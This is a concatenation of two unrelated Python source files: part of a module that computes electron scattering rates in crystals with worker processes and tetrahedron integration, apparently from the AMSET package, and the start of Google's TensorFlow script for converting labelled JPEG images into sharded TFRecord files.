return [s for s in self.scatterers if isinstance(s, AbstractElasticScattering)]
@property
def scatterer_labels(self):
basic_names = [s.name for s in self.basic_scatterers]
elastic_names = [s.name for s in self.elastic_scatterers]
inelastic_names = [s.name for s in self.inelastic_scatterers]
return basic_names + elastic_names + inelastic_names
@staticmethod
def get_scatterers(
scattering_type: Union[str, List[str], float],
settings: Dict[str, Any],
amset_data: AmsetData,
) -> List[Union[AbstractElasticScattering, AbstractInelasticScattering]]:
if scattering_type == "auto":
# dynamically determine the available scattering mechanism subclasses
logger.info(
"Examining material properties to determine possible scattering "
"mechanisms"
)
scattering_type = []
for name, mechanism in _scattering_mechanisms.items():
req_prop = mechanism.required_properties
if all([settings.get(x, None) is not None for x in req_prop]):
scattering_type.append(name)
if not scattering_type:
raise ValueError(
"No scattering mechanisms possible with material properties"
)
else:
for name in scattering_type:
missing_properties = [
p
for p in _scattering_mechanisms[name].required_properties
if settings.get(p, None) is None
]
if missing_properties:
str_missing = ", ".join(missing_properties)
raise ValueError(
"{} scattering mechanism specified but the following "
"material properties are missing: {}".format(name, str_missing)
)
str_scats = ", ".join(scattering_type)
logger.info(f"Scattering mechanisms to be calculated: {str_scats}")
return [
_scattering_mechanisms[name].from_amset_data(settings, amset_data)
for name in scattering_type
]
def calculate_scattering_rates(self):
spins = self.amset_data.spins
kpoints = self.amset_data.kpoints
energies = self.amset_data.energies
fermi_shape = self.amset_data.fermi_levels.shape
scattering_shape = (len(self.scatterer_labels),) + fermi_shape
rate_shape = {s: scattering_shape + energies[s].shape for s in spins}
# rates has shape (spin, nscatterers, ndoping, ntemp, nbands, nkpoints)
rates = {s: np.zeros(rate_shape[s]) for s in spins}
masks = {s: np.full(rate_shape[s], True) for s in spins}
logger.info("Scattering information:")
log_list([f"# ir k-points: {len(self.amset_data.ir_kpoints_idx)}"])
for spin in spins:
for b_idx in range(len(self.amset_data.energies[spin])):
str_b = "Calculating rates for {} band {}"
logger.info(str_b.format(spin_name[spin], b_idx + 1))
t0 = time.perf_counter()
(
rates[spin][..., b_idx, :],
masks[spin][..., b_idx, :],
) = self.calculate_band_rates(spin, b_idx)
info = [
f"max rate: {rates[spin][..., b_idx, :].max():.4g}",
f"min rate: {rates[spin][..., b_idx, :].min():.4g}",
]
log_list(info, level=logging.DEBUG)
log_list([f"time: {time.perf_counter() - t0:.4f} s"])
# fill in k-points outside Fermi-Dirac cutoffs with a default value
rates[spin][masks[spin]] = 1e14
# if the k-point density is low, some k-points may not have other k-points
# within the energy tolerance leading to zero rates
rates = _interpolate_zero_rates(
rates, kpoints, masks, progress_bar=self.progress_bar
)
# enforce symmetry of interpolated points
ir_idx = self.amset_data.ir_kpoints_idx
ir_to_full = self.amset_data.ir_to_full_kpoint_mapping
rates = {s: sr[..., ir_idx][..., ir_to_full] for s, sr in rates.items()}
self.terminate_workers()
return rates
def calculate_band_rates(self, spin: Spin, b_idx: int):
if self.workers is None and not self._basic_only:
self.initialize_workers()
vol = self.amset_data.structure.lattice.reciprocal_lattice.volume
conversion = vol / (4 * np.pi ** 2)
kpoints_idx = self.amset_data.ir_kpoints_idx
nkpoints = len(kpoints_idx)
band_energies = self.amset_data.energies[spin][b_idx, kpoints_idx]
mask = band_energies < self.scattering_energy_cutoffs[0]
mask |= band_energies > self.scattering_energy_cutoffs[1]
fill_mask = mask[self.amset_data.ir_to_full_kpoint_mapping]
n = np.sum(~fill_mask)
logger.info(f" ├── # k-points within Fermi–Dirac cut-offs: {n}")
k_idx_in_cutoff = kpoints_idx[~mask]
ir_idx_in_cutoff = np.arange(nkpoints)[~mask]
iterable = list(zip(k_idx_in_cutoff, ir_idx_in_cutoff))
to_stack = []
if len(self.basic_scatterers) > 0:
basic_rates = np.array(
[m.rates[spin][:, :, b_idx, kpoints_idx] for m in self.basic_scatterers]
)
to_stack.append(basic_rates)
if len(self.elastic_scatterers) > 0:
elastic_prefactors = conversion * np.array(
[m.prefactor(spin, b_idx) for m in self.elastic_scatterers]
)
elastic_rates = np.zeros(elastic_prefactors.shape + (nkpoints,))
if len(k_idx_in_cutoff) > 0:
if self.progress_bar:
pbar = get_progress_bar(total=len(iterable), desc="elastic")
else:
pbar = None
for k_idx, ir_idx in iterable:
self.in_queue.put((spin, b_idx, k_idx, False, ir_idx))
for _ in range(len(iterable)):
ir_idx, elastic_rates[..., ir_idx] = self._get_rate_from_queue()
if pbar:
pbar.update()
if pbar:
pbar.close()
elastic_rates *= elastic_prefactors[..., None]
to_stack.append(elastic_rates)
if len(self.inelastic_scatterers) > 0:
inelastic_prefactors = conversion * np.array(
[m.prefactor(spin, b_idx) for m in self.inelastic_scatterers]
)
inelastic_rates = np.zeros(inelastic_prefactors.shape + (nkpoints,))
f_pop = self.settings["pop_frequency"]
energy_diff = f_pop * 1e12 * 2 * np.pi * hbar * ev_to_hartree
if len(k_idx_in_cutoff) > 0:
if self.progress_bar:
pbar = get_progress_bar(total=len(iterable) * 2, desc="inelastic")
else:
pbar = None
inelastic_rates[:, :, :, ir_idx_in_cutoff] = 0
for k_idx, ir_idx in iterable:
for ediff in [energy_diff, -energy_diff]:
self.in_queue.put((spin, b_idx, k_idx, ediff, ir_idx))
for i in range(len(iterable) * 2):
ir_idx, rate = self._get_rate_from_queue()
inelastic_rates[..., ir_idx] += rate
if pbar:
pbar.update()
if pbar:
pbar.close()
inelastic_rates *= inelastic_prefactors[..., None]
to_stack.append(inelastic_rates)
all_band_rates = np.vstack(to_stack)
return all_band_rates[..., self.amset_data.ir_to_full_kpoint_mapping], fill_mask
def _get_rate_from_queue(self):
# handle exception gracefully to avoid hanging processes
try:
result = self.out_queue.get(timeout=10)
except Empty:
            # didn't receive anything for 10 seconds; this could be OK or it
            # could mean that the worker processes have been killed
if not self._workers_alive():
self.terminate_workers()
raise MemoryError(
"Some subprocessess were killed unexpectedly. Could be OOM "
"Killer?\nTry reducing nworkers."
)
else:
return self._get_rate_from_queue()
if isinstance(result[0], Exception):
logger.error(
"Scattering process ended with error:\n{}\nexiting".format(
str(result[1])
)
)
self.terminate_workers()
raise result[0]
return result
def _workers_alive(self):
return all([worker.is_alive() for worker in self.workers])
def scattering_worker(
tbs_reference,
overlap_type,
overlap_calculator_reference,
mrta_calculator_reference,
elastic_scatterers,
inelastic_scatterers,
amset_data_min_reference,
coeffs_buffer,
coeffs_mapping_buffer,
in_queue,
out_queue,
):
try:
tbs = TetrahedralBandStructure.from_reference(*tbs_reference)
mrta_calculator = MRTACalculator.from_reference(*mrta_calculator_reference)
amset_data_min = _AmsetDataMin.from_reference(*amset_data_min_reference)
if coeffs_buffer is None:
coeffs = None
coeffs_mapping = None
else:
coeffs = dict_array_from_buffer(coeffs_buffer)
coeffs_mapping = dict_array_from_buffer(coeffs_mapping_buffer)
if overlap_type == "wavefunction":
overlap_calculator = WavefunctionOverlapCalculator.from_reference(
*overlap_calculator_reference
)
elif overlap_type == "projection":
overlap_calculator = ProjectionOverlapCalculator.from_reference(
*overlap_calculator_reference
)
else:
raise ValueError(f"Unrecognised overlap type: {overlap_type}")
elastic_scatterers = [
AcousticDeformationPotentialScattering.from_reference(*s)
if isinstance(s, tuple)
else s
for s in elastic_scatterers
]
with np.errstate(all="ignore"):
while True:
job = in_queue.get()
if job is None:
break
spin, b_idx, k_idx, energy_diff, ir_k_idx = job
rate = calculate_rate(
tbs,
overlap_calculator,
mrta_calculator,
elastic_scatterers,
inelastic_scatterers,
amset_data_min,
coeffs,
coeffs_mapping,
spin,
b_idx,
k_idx,
energy_diff=energy_diff,
)
out_queue.put((ir_k_idx, rate))
except BaseException as e:
error_msg = traceback.format_exc()
out_queue.put((e, error_msg))
class _AmsetDataMin:
def __init__(self, structure, kpoint_mesh, velocities, fermi_levels, temperatures):
self.structure = structure
self.kpoint_mesh = kpoint_mesh
self.velocities = velocities
self.fermi_levels = fermi_levels
self.temperatures = temperatures
def to_reference(self):
velocities_buffer, self.velocities = create_shared_dict_array(
self.velocities, return_shared_data=True
)
return (
self.structure,
self.kpoint_mesh,
velocities_buffer,
self.fermi_levels,
self.temperatures,
)
@classmethod
def from_reference(
cls, structure, kpoint_mesh, velocities_buffer, fermi_levels, temperatures
):
return cls(
structure,
kpoint_mesh,
dict_array_from_buffer(velocities_buffer),
fermi_levels,
temperatures,
)
@classmethod
def from_amset_data(cls, amset_data):
return cls(
amset_data.structure,
amset_data.kpoint_mesh,
amset_data.velocities,
amset_data.fermi_levels,
amset_data.temperatures,
)
def calculate_rate(
tbs: TetrahedralBandStructure,
overlap_calculator,
mrta_calculator,
elastic_scatterers,
inelastic_scatterers,
amset_data_min: _AmsetDataMin,
coeffs,
coeffs_mapping,
spin,
b_idx,
k_idx,
energy_diff=None,
):
rlat = amset_data_min.structure.lattice.reciprocal_lattice.matrix
velocity = amset_data_min.velocities[spin][b_idx, k_idx]
energy = tbs.energies[spin][b_idx, k_idx]
if energy_diff:
energy += energy_diff
(
tet_dos,
tet_mask,
cs_weights,
tet_contributions,
) = tbs.get_tetrahedra_density_of_states(
spin,
energy,
return_contributions=True,
symmetry_reduce=False,
# band_idx=b_idx, # turn this on to disable interband scattering
)
if len(tet_dos) == 0:
return 0
# next, get k-point indices and band_indices
property_mask, band_kpoint_mask, band_mask, kpoint_mask = tbs.get_masks(
spin, tet_mask
)
k = tbs.kpoints[k_idx]
k_primes = tbs.kpoints[kpoint_mask]
if coeffs is not None:
# use cached coefficients to calculate the overlap on the fine mesh
# tetrahedron vertices
spin_coeffs = coeffs[spin]
spin_coeffs_mapping = coeffs_mapping[spin]
if len(spin_coeffs.shape) == 3:
            # non-collinear (ncl) wavefunction coefficients (extra spinor axis)
overlap = _get_overlap_ncl(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
)
else:
overlap = _get_overlap(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
)
else:
overlap = overlap_calculator.get_overlap(spin, b_idx, k, band_mask, k_primes)
# put overlap back in array with shape (nbands, nkpoints)
all_overlap = np.zeros(tbs.energies[spin].shape)
all_overlap[band_kpoint_mask] = overlap
# now select the properties at the tetrahedron vertices
vert_overlap = all_overlap[property_mask]
# get interpolated overlap at centre of tetrahedra cross sections
tet_overlap = get_cross_section_values(vert_overlap, *tet_contributions)
tetrahedra = tbs.tetrahedra[spin][tet_mask]
# have to deal with the case where the tetrahedron cross section crosses the
# zone boundary. This is a slight inaccuracy but we just treat the
# cross section as if it is on one side of the boundary
tet_kpoints = tbs.kpoints[tetrahedra]
base_kpoints = tet_kpoints[:, 0][:, None, :]
k_diff = pbc_diff(tet_kpoints, base_kpoints) + pbc_diff(base_kpoints, k)
# project the tetrahedron cross sections onto 2D surfaces in either a triangle
# or quadrilateral
k_diff = np.dot(k_diff, rlat)
intersections = get_cross_section_values(k_diff, *tet_contributions, average=False)
projected_intersections, basis = get_projected_intersections(intersections)
k_spacing = np.linalg.norm(np.dot(rlat, 1 / amset_data_min.kpoint_mesh))
qpoints, weights, mapping = get_fine_mesh_qpoints(
projected_intersections,
basis,
*tet_contributions[0:3],
high_tol=k_spacing * 0.5,
med_tol=k_spacing * 2,
cross_section_weights=cs_weights,
)
qpoint_norm_sq = np.sum(qpoints ** 2, axis=-1)
k_primes = np.dot(qpoints, np.linalg.inv(rlat)) + k
k_primes = kpoints_to_first_bz(k_primes)
# unit q in reciprocal cartesian coordinates
unit_q = qpoints / np.sqrt(qpoint_norm_sq)[:, None]
if energy_diff:
e_fd = _get_fd(energy, amset_data_min.fermi_levels, amset_data_min.temperatures)
emission = energy_diff <= 0
rates = [
s.factor(unit_q, qpoint_norm_sq, emission, e_fd)
for s in inelastic_scatterers
]
mrta_factor = 1
else:
mrta_factor = mrta_calculator.get_mrta_factor(
spin, b_idx, k, tet_mask[0][mapping], k_primes
)
rates = [
s.factor(unit_q, qpoint_norm_sq, spin, b_idx, k, velocity)
for s in elastic_scatterers
]
rates = np.array(rates)
rates /= amset_data_min.structure.lattice.reciprocal_lattice.volume
rates *= tet_overlap[mapping] * weights * mrta_factor
# this is too expensive vs tetrahedron integration and doesn't add much more
# accuracy; could offer this as an option
# overlap = self.amset_data.overlap_calculator.get_overlap(
# spin, b_idx, k, tet_mask[0][mapping], k_primes
# )
# rates *= overlap * weights * mrta_factor
# sometimes the projected intersections can be nan when the density of states
# contribution is infinitesimally small; this catches those errors
rates[np.isnan(rates)] = 0
return np.sum(rates, axis=-1)
@numba.njit
def _get_overlap(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
):
res = np.zeros(band_mask.shape[0])
initial = np.conj(spin_coeffs[spin_coeffs_mapping[b_idx, k_idx]])
for i in range(band_mask.shape[0]):
final = spin_coeffs[spin_coeffs_mapping[band_mask[i], kpoint_mask[i]]]
res[i] = np.abs(np.dot(final, initial)) ** 2
return res
@numba.njit
def _get_overlap_ncl(
spin_coeffs, spin_coeffs_mapping, b_idx, k_idx, band_mask, kpoint_mask
):
res = np.zeros(band_mask.shape[0])
initial = np.conj(spin_coeffs[spin_coeffs_mapping[b_idx, k_idx]])
for i in range(band_mask.shape[0]):
final = spin_coeffs[spin_coeffs_mapping[band_mask[i], kpoint_mask[i]]]
sum_ = 0j
for j in range(final.shape[0]):
sum_ += initial[j, 0] * final[j, 0] + initial[j, 1] * final[j, 1]
res[i] = abs(sum_) ** 2
return res
def _interpolate_zero_rates(
rates, kpoints, masks: Optional = None, progress_bar: bool = defaults["print_log"]
):
# loop over all scattering types, doping, temps, and bands and interpolate
# zero scattering rates based on the nearest k-point
logger.info("Interpolating missing scattering rates")
n_rates = sum([np.product(rates[spin].shape[:-1]) for spin in rates])
if progress_bar:
pbar = get_progress_bar(total=n_rates, desc="progress")
else:
pbar = None
t0 = time.perf_counter()
k_idx = np.arange(len(kpoints))
for spin in rates:
for s in range(rates[spin].shape[0]):
# if a rate at a k-point for any doping, or temperature is zero then
# flag it for interpolation
all_non_zero_rates = (rates[spin][s] > 1e6).all(axis=(0, 1))
for d, t, b in np.ndindex(rates[spin].shape[1:-1]):
if masks is not None:
mask = np.invert(masks[spin][s, d, t, b])
else:
mask = [True] * len(rates[spin][s, d, t, b])
non_zero_rates = all_non_zero_rates[b][mask]
zero_rate_idx = k_idx[mask][~non_zero_rates]
non_zero_rate_idx = k_idx[mask][non_zero_rates]
if not np.any(non_zero_rates):
# all scattering rates are zero so cannot interpolate
# generally this means the scattering prefactor is zero. E.g.
# for POP when studying non polar materials
rates[spin][s, d, t, b, mask] += small_val
elif np.sum(non_zero_rates) != np.sum(mask):
# seems to work best when all the kpoints are +ve therefore add 0.5
# Todo: Use cartesian coordinates?
# interpolate log rates to avoid the bias towards large rates
rates[spin][s, d, t, b, zero_rate_idx] = np.exp(
griddata(
points=kpoints[non_zero_rate_idx] + 0.5,
values=np.log(rates[spin][s, d, t, b, non_zero_rate_idx]),
xi=kpoints[zero_rate_idx] + 0.5,
method="nearest",
)
)
# rates[spin][s, d, t, b, zero_rate_idx] = 10 ** (15 + s)
if pbar is not None:
pbar.update()
if pbar is not None:
pbar.close()
log_time_taken(t0)
return rates
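# Illustrative sketch (an addition, not called by the code above): a stripped
# down version of the nearest-neighbour fill used in _interpolate_zero_rates,
# for a single 1D array of rates over the k-point mesh. The function name and
# the 1e6 threshold follow the usage above; the log/exp round trip is kept to
# mirror the original pattern (it only matters for non-"nearest" methods).
def _example_fill_zero_rates(kpoints, rates):
    """Fill (near-)zero entries of ``rates`` from the nearest non-zero k-point."""
    non_zero = rates > 1e6
    if not np.any(non_zero) or np.all(non_zero):
        # nothing to interpolate from, or nothing to fill
        return rates
    filled = rates.copy()
    filled[~non_zero] = np.exp(
        griddata(
            points=kpoints[non_zero] + 0.5,
            values=np.log(rates[non_zero]),
            xi=kpoints[~non_zero] + 0.5,
            method="nearest",
        )
    )
    return filled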
def get_fine_mesh_qpoints(
intersections,
basis,
cond_a_mask,
cond_b_mask,
cond_c_mask,
high_tol=0.1,
med_tol=0.2,
cross_section_weights=None,
):
if cross_section_weights is None:
cross_section_weights = np.ones(len(intersections))
# minimum norm in each intersection
all_norms = np.linalg.norm(intersections, axis=-1)
# intersections now has shape nvert, ntet, 2 (i.e., x, y coords)
intersection_idxs = np.arange(len(intersections))
z_coords = intersections[:, 0, 2]
intersections = intersections[:, :, :2].transpose(1, 0, 2)
triangle_mask = cond_a_mask | cond_c_mask
# have to do these separately as the triangle intersections always have [0, 0, 0]
# as the last coordinate
norms = np.ones(len(all_norms))
norms[triangle_mask] = np.min(all_norms[:, :3][triangle_mask], axis=-1)
norms[cond_b_mask] = np.min(all_norms[cond_b_mask], axis=-1)
qpoints = []
qweights = []
mapping = [] # maps a qpoint to an intersection index
def _get_tri_mesh(prec, min_norm, max_norm):
scheme = ni[prec]["triangle"]
mask = (min_norm <= norms) & (norms < max_norm) & triangle_mask
if not np.any(mask):
return
simplex = intersections[:3, mask]
vol = quadpy.tn.get_vol(simplex)
xy_coords = quadpy.tn.transform(scheme.points, simplex.T)
weights = (
scheme.weights[None] * vol[:, None] * cross_section_weights[mask][:, None]
)
qpoints.append(get_q(xy_coords, z_coords[mask]))
qweights.append(weights.reshape(-1))
mapping.append(np.repeat(intersection_idxs[mask], len(scheme.weights)))
def _get_quad_mesh(prec, min_norm, max_norm):
scheme = ni[prec]["quad"]
mask = (min_norm <= norms) & (norms < max_norm) & cond_b_mask
if not np.any(mask):
return
cube = intersections.reshape((2, 2, -1, 2))[:, :, mask]
# 4 is taken from quadpy CnScheme.integrate
# ref_vol = 2 ** numpy.prod(len(ncube.shape) - 1) which for quadrilaterals = 4
vol = 4 * np.abs(quadpy.cn._helpers.get_detJ(scheme.points, cube))
xy_coords = quadpy.cn.transform(scheme.points, cube).T
weights = scheme.weights[None] * vol * cross_section_weights[mask][:, None]
qpoints.append(get_q(xy_coords, z_coords[mask]))
qweights.append(weights.reshape(-1))
mapping.append(np.repeat(intersection_idxs[mask], len(scheme.weights)))
_get_tri_mesh("high", 0, high_tol)
_get_tri_mesh("medium", high_tol, med_tol)
_get_tri_mesh("low", med_tol, np.Inf)
_get_quad_mesh("high", 0, high_tol)
_get_quad_mesh("medium", high_tol, med_tol)
_get_quad_mesh("low", med_tol, np.Inf)
qpoints = np.concatenate(qpoints)
qweights = np.concatenate(qweights)
mapping = np.concatenate(mapping)
return get_kpoints_in_original_basis(qpoints, basis[mapping]), qweights, mapping
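# Illustrative sketch (an addition, not called by the code above): this mirrors
# the scheme.points / scheme.weights / quadpy.tn.transform / quadpy.tn.get_vol
# pattern used in _get_tri_mesh, applied to a single reference triangle. The
# array shapes follow the usage above and are an assumption about this quadpy
# version; they may need adjusting for other quadpy releases.
def _example_triangle_quadrature(func, precision="low"):
    """Approximate the integral of ``func(x, y)`` over the unit right triangle."""
    scheme = ni[precision]["triangle"]
    # one triangle with vertices (0,0), (1,0), (0,1); shape (3, 1, 2) to match
    # the (nvert, ntet, 2) layout used in _get_tri_mesh
    simplex = np.array([[[0.0, 0.0]], [[1.0, 0.0]], [[0.0, 1.0]]])
    vol = quadpy.tn.get_vol(simplex)                    # area of each triangle
    xy = quadpy.tn.transform(scheme.points, simplex.T)  # shape (2, ntri, npts)
    weights = scheme.weights[None] * vol[:, None]       # per-point quadrature weights
    values = func(xy[0], xy[1])
    return float(np.sum(weights * values))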
def get_kpoints_in_original_basis(q, basis):
# transform k back to original lattice basis in cartesian coords
return np.einsum("ikj,ij->ik", basis, q)
def get_q(x, z_coords):
z = np.repeat(z_coords[:, None], len(x[0][0]), axis=-1)
return np.stack([x[0], x[1], z], axis=-1).reshape(-1, 3)
def _get_fd(energy, fermi_levels, temperatures):
f = np.zeros(fermi_levels.shape)
for n, t in np.ndindex(fermi_levels.shape):
f[n, t] = fd(energy, fermi_levels[n, t], temperatures[t] * boltzmann_au)
return f
|
build_image_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-directory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If your data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains the list of valid labels, one label per line.
# Assumes that the file contains entries as such:
#   dog
#   cat
#   flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number, starting from 1
# (label index 0 is reserved for the background class).
tf.app.flags.DEFINE_string('labels_file', '', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
# 'image/class/label': _int64_feature(label),
# 'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
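# Hedged reading-side sketch (an addition, not used by this script): the
# feature spec below mirrors the fields written by _convert_to_example above,
# using the TF1-style tf.parse_single_example / tf.FixedLenFeature API that the
# rest of this file assumes. Adjust the function name and keys to your reader.
def _parse_example_sketch(serialized_example):
  """Parse one serialized Example written by this script and decode the JPEG."""
  feature_spec = {
      'image/encoded': tf.FixedLenFeature([], tf.string),
      'image/height': tf.FixedLenFeature([], tf.int64),
      'image/width': tf.FixedLenFeature([], tf.int64),
      'image/colorspace': tf.FixedLenFeature([], tf.string),
      'image/channels': tf.FixedLenFeature([], tf.int64),
      'image/format': tf.FixedLenFeature([], tf.string),
      'image/filename': tf.FixedLenFeature([], tf.string),
  }
  features = tf.parse_single_example(serialized_example, feature_spec)
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/filename']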
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
  # Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
        print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_shards_per_batch))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
